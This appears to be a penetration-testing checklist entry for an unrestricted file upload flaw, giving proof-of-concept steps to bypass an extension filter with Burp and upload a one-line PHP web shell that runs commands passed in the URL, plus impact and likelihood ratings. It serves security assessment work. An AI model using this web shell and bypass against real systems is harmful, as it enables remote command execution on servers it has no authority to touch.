V11 - Business Logic
Unrestricted File Upload - File Extension Filter Bypass
POC
- Upload an image file
- Intercept the request with Burp
- Change filename="test.php.jpg" to filename="test.php"
- Keep the Content-Type: image/jpeg
- Include the following content in the file <?php system($_GET['cmd'])?>
- Try to see if this can lead to command execution with appending ?cmd=ls to the image URL
Impact
Low-Medium
Likelihood
Low-Medium